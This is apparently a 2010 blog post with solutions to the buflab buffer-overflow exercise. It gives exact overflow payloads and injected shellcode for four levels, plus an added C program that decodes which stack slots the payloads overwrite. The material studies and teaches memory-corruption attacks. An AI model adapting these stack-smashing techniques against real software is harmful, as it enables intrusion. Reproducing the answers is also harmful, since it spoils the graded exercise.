buflab

Level 0: 
Overwrite the return address with the address of smoke(), 0x08048ef0, written in little-endian byte order.
The exploit file should be:
---- 
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 f0 8e 04 08 
---- 
'30' can be any byte value 

Level 1: 
Overwrite the return address with the address of fizz(), 0x08048e80.
Overwrite the argument with the cookie 0x11264556.
---- 
30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 80 8e 04 08 56 45 26 11 
---- 
'30' can be any byte value 

Level 2: 
Overwrite the return address with the start of the array, 0xbfffb70c, where we put the code.
The code is shown below.

   3:   b8 56 45 26 11    mov    $0x11264556,%eax
   8:   a3 dc b0 04 08    mov    %eax,0x804b0dc
   d:   68 10 8e 04 08    push   $0x8048e10
  12:   c3                ret

The code overwrites global_value at 0x0804b0dc with the cookie 0x11264556,
then pushes the address of bang() (0x08048e10) and returns to it.
---- 
b8 56 45 26 11 a3 dc b0 04 08 68 10 8e 04 08 c3 0c b7 ff bf 
---- 

Level 3: 
Overwrite the return address with the start of the array, 0xbfffb70c, where we put the code.
Overwrite the saved ebp with its original value, 0xbfffb748.
The code is:
   3:   b8 56 45 26 11    mov    $0x11264556,%eax
   8:   68 9c 91 04 08    push   $0x804919c
   d:   c3                ret
The code sets the eax register to the cookie 0x11264556,
then pushes the real return address and returns.
---- 
b8 56 45 26 11 68 9c 91 04 08 c3 90 48 b7 ff bf 0c b7 ff bf 
---- 
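
To see how the byte strings above map onto the stack frame, here is an added example (not part of the original post) that decodes a payload and reads the little-endian words landing on the saved ebp and return-address slots. The offsets 12 and 16 are read off the page's payloads; the function and constant names are hypothetical.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Assumption taken from the page's payloads: saved ebp at 12, return address at 16. */
enum { EBP_OFF = 12, RET_OFF = 16, MAX_LEN = 64 };
#define BUF_ADDR 0xbfffb70cu /* buffer start as given in Levels 2 and 3 */

/* Parse space-separated hex byte pairs; returns byte count, or -1 on bad input. */
int parse_hex(const char *s, uint8_t *out, int cap) {
    int n = 0;
    while (*s) {
        if (*s == ' ') { s++; continue; }
        if (!isxdigit((unsigned char)s[0]) || !isxdigit((unsigned char)s[1]) || n == cap)
            return -1;
        char pair[3] = { s[0], s[1], '\0' };
        out[n++] = (uint8_t)strtoul(pair, NULL, 16);
        s += 2;
    }
    return n;
}

/* Little-endian 32-bit word at byte offset off, or 0 if the input does not reach it. */
uint32_t word_at(const char *hex, int off) {
    uint8_t b[MAX_LEN];
    int n = parse_hex(hex, b, MAX_LEN);
    if (n < off + 4) return 0;
    return b[off] | (uint32_t)b[off + 1] << 8 | (uint32_t)b[off + 2] << 16 | (uint32_t)b[off + 3] << 24;
}

/* 1 if the new return address points back into the input itself (Levels 2 and 3),
   which only works when the stack is executable; 0 if it targets existing code. */
int returns_into_input(const char *hex) {
    uint32_t ret = word_at(hex, RET_OFF);
    return ret >= BUF_ADDR && ret < BUF_ADDR + RET_OFF;
}

int main(void) {
    /* Payload strings copied from Level 0 and Level 3 above. */
    const char *lv[] = {
        "30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 f0 8e 04 08",
        "b8 56 45 26 11 68 9c 91 04 08 c3 90 48 b7 ff bf 0c b7 ff bf",
    };
    for (int i = 0; i < 2; i++)
        printf("ebp slot=0x%08x ret=0x%08x into_input=%d\n", (unsigned)word_at(lv[i], EBP_OFF),
               (unsigned)word_at(lv[i], RET_OFF), returns_into_input(lv[i]));
    return 0;
}
```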
posted @ 2010-04-15 19:33